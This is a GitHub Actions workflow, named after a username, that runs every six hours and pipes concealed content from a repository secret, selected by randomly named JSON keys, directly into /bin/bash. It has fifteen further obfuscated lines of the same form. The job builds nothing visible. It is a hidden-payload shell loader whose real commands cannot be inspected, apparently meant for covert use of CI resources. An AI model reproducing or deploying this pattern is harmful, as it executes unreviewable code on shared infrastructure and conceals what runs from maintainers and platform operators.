name: lishuhuan4567

on:
  workflow_dispatch:
  schedule:
    - cron: '22 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lishuhuan4567
        env:
          ub51: ${{ secrets.ub51 }}
        run: |
          echo $ub51 | jq -r .thnac46 | /bin/bash
          echo $ym40929 | jq -r .mbaay78 | /bin/bash
          echo $i330 | jq -r .boro305 | /bin/bash
          echo $zo824 | jq -r .bcz22230 | /bin/bash
          echo $by638 | jq -r .fzrua16 | /bin/bash
          echo $rvxqm0 | jq -r .yhnv22 | /bin/bash
          echo $jybuk1750 | jq -r .dlt1716 | /bin/bash
          echo $qeq43 | jq -r .lhlbr635 | /bin/bash
          echo $g5916 | jq -r .jioe30776 | /bin/bash
          echo $ay2 | jq -r .cpvx17869 | /bin/bash
          echo $g50 | jq -r .urpij66 | /bin/bash
          echo $cotax97028 | jq -r .hzlpl201 | /bin/bash
          echo $g38 | jq -r .fsoay9298 | /bin/bash
          echo $ep2 | jq -r .h00 | /bin/bash
          echo $y32615 | jq -r .gdkf758 | /bin/bash
          echo $ky4385 | jq -r .pkiu3422 | /bin/bash

